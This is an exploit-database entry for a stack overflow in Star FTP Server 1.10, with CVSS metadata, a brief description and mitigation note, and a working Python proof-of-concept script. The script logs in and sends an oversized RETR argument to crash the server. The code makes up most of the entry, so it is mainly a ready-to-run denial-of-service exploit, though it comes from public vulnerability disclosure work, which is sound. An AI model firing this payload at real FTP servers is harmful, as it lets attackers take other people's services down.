Star FTP server 1.10 Remote 0day DoS Exploit

vendor:

Star FTP Server

by:

Necro

7.5

CVSS

HIGH

Stack Overflow

119

CWE

Product Name: Star FTP Server

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:starftp:star_ftp_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2006

Star FTP server 1.10 Remote 0day DoS Exploit

Star FTP server 1.10 is vulnerable to a remote DoS attack due to a stack overflow vulnerability. The vulnerability is triggered when a malicious user sends a specially crafted RETR command with an overly long argument to the FTP server. This causes the stack to overflow and the server to crash.

Mitigation:

Upgrade to the latest version of Star FTP server.

Source

Exploit-DB raw data:

# Star FTP server 1.10
# Bug type: stack overflow
# Found by Necro <neco * ihack.pl> http://iHACK.pl

from socket import *
from sys import exit

print '\n[*] Star FTP server 1.10 Remote 0day DoS Exploit'
print '[*] Bug found by Necro <necro*ihack.pl> http://iHACK.pl'

host = '127.0.0.1'
port = 21

username = 'necro'
password = 'dupa'

evil = 'RETR' + '\x20' + '\x41' * 1024 + '\r\n'

s = socket(AF_INET, SOCK_STREAM)
try:
   s.connect((host, port))
except:
   print '\n[-] Connection Error'
   exit()

s.recv(1024)
s.send('USER' + '\x20' + username + '\r\n')
s.recv(1024)
s.send('PASS' + '\x20' + password + '\r\n')
s.recv(1024)
s.send('PORT 2000\r\n')
s.recv(1024)
s.send(evil)
s.recv(1024)
s.send(evil)
s.close()

print '[+] Done, shutdown.'

# milw0rm.com [2006-12-17]